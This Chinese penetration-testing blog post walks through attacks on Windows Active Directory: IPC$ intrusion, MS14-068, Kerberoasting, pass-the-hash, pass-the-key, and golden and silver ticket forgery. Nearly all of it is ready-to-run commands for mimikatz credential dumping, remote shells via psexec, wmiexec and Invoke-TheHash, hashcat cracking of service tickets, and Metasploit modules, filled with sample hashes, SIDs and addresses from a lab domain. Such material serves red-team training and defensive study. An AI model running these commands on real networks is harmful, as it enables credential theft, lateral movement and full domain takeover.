1. 首页
  2. 渗透测试

域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

IPC

IPC$入侵

  • 建立非空连接
    域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

  • 新建批处理
    域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

  • Copy命令上传
    域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

  • 查看目标靶机时间
    域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

  • 通过at命令在特定时间执行批处理文件
    域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

  • 在目标靶机上查看
    域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

其他命令

  • 将目标共享建立一个映射g盘
    net use g: \\192.168.3.68\c$
    域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

  • 查看已建立的会话
    域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

通过工具进行会话连接执行

psexec.exe  \\192.168.1.108   cmd  -uadministrator   -p  123456
csript.exe  wmiexec.vbs   /shell   192.168.1.108   administrator   123456

返回一个cmd交互界面执行即可

MS14068

  • 首先尝试访问域控共享文件夹
    域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating
    拒绝访问

  • 使用ms16048

-u 域账号[email protected]+域名称
-p 为当前用户的密码,即 ts1 的密码
-s 为 ts1 的 SID 值,可以通过 whoami /all 来获取用户的 SID 值 -d 为当前域的域控

  • 生成ccache文件
    域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

  • 删除当前缓存的kerboeos票据
    kerberos::purge
    域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

  • 导入ccache文件
    kerberos::ptc
    域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

  • 再次访问域控共享文件
    域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

Kerberoating

早期kerberoating

工具 Kerberoast工具包 Mimikatz

  • 使用Kerberoast工具包GetUserPNs.ps1进行SPN扫描

域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

  • 根据微软提供的类KerberosRequeststorSecurityToken发起Kerberos请求申请票据
    Add-Type -AssemblyName System.IdentityModel
    New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SRC_DB_ODAY.org:1433"
    域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

  • 通过klist命令查看当前会话存储的Kerberos票据
    klist
    域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

  • 使用mimikatz导出
    kerberos::list /export
    域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

  • 使用kerberoast 工具集中的 tgsrepcrack.py 工具进行离线爆破
    python tgsrepcrack.py list1.txt [email protected]~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi
    域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

kerberoating新姿势

工具 Invoke-Kerberoast.ps1 HashCat

  • 转为Hashcat格式
    Invoke-kerberoast –outputformat hashcat | fl
    域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating
  • 保存
    nvoke-Kerberoast -Outputformat Hashcat | fl > test1.txt

  • Hashcat爆破
    hashcat64.exe –m 13100 test1.txt password.list --force域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

Pth

Pass the hash

  • 使用mimikatz先获取hash
privilege::debug
sekurlsa::logonpasswords

域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

  • 攻击机执行
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:SRV-DB-0DAY /ntlm:ac307fdeab3e8307c3892c163a7808d5"

域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

wmiexec

  • Invoke-SMBExec
https://github.com/Kevin-Robertson/Invoke-TheHash

Invoke-WMIExec -Target 192.168.3.21 -Domain workgroup -Username administrator -Hash ccef208c6485269c20db2cad21734fe7 -Command "calc.exe" -verbose
  • Invoke-SMBExec
Invoke-SMBExec -Target 192.168.3.21 -Domain test.local -Username test1 -Hash ccef208c6485269c20db2cad21734fe7 -Command "calc.exe" -verbose

如果只有SMB文件共享的权限,没有远程执行权限,可以使用该脚本

  • wmiexec.py
https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py

https://github.com/maaaaz/impacket-examples-windows
wmiexec -hashes 00000000000000000000000000000000:ccef208c6485269c20db2cad21734fe7 workgroup/[email protected]68.3.21 "whoami"

普通用户可用

CrackMapExec

https://github.com/byt3bl33d3r/CrackMapExec.git
crackmapexec 192.168.3.0/24 -u administrator -H ccef208c6485269c20db2cad21734fe7

Ptk

对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012,可以使用AES keys代替NT hash

  • 获取用户的aes key
mimikatz "privilege::debug" "sekurlsa::ekeys"

域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

  • 注入aes key
mimikatz "privilege::debug" "sekurlsa::pth /user:sqlsvr /domain:0DAY.ORG /aes256:bf2cab4e27a426c9ec9d21c919f119843415ee5d98587063d6e48d16633c5436" 

域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

Ptt

Golden ticket(黄金票据)

前提:
域名称
域SID
krbtgt账户密码
伪造用户名

  • dump krbtgt hash
privilege::debug
lsadump::lsa /patch

域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

  • 生成ticket
kerberos::golden  /admin:administrator  /domain:0day.org /sid: S-1-5-21-1812960810-2335050734-3517558805 /krbtgt:36f9d9e6d98ecf8307baf4f46ef842a2  /ticket:test.kiribi

域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

  • 注入凭据
kerberos::ptt test.kirbi

域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating
– 验证Golden ticket

域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

golden ticket(白银票据)

前提:
域名称
域SID
域的服务账户的密码hash
伪造用户名

  • dump server hash
privilege::debug
sekurlsa::logonpasswords

域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

  • 导入凭证
kerberos::golden /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /target:192.168.3.142 /rc4:74cca677f85c7c566352fd846eb0d82a  /service:cifs /user:syst1m /ptt
  • 验证

域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating

Tips

mimikatz复制粘贴困难,可使用如>>log.txt
exploit/windows/smb/psexec 使用hash传递
post/windows/gather/smart_hashdump 读取hash
.domain_list_gen 获取域管理账户列表
auxiliary/gather/kerberos_enumusers 用户名枚举
auxiliary/admin/kerberos/ms14_068_kerberos_checksum 14068
load kiwi
kerberos_ticket_use /tmp/[email protected] kiwi扩展来导入TGT票证
参考:https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit/
  • Mimikatz
load mimikatz 加载
mimikatz_command -f version  版本
mimikatz_command -f fu 获取可用模块列表
msv 检索msv凭证
wdigest 读取密码
kerberos 尝试检索kerberos凭据

看到了再加~

原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er

发表评论

电子邮件地址不会被公开。 必填项已用*标注

联系我们

在线咨询:点击这里给我发消息

QR code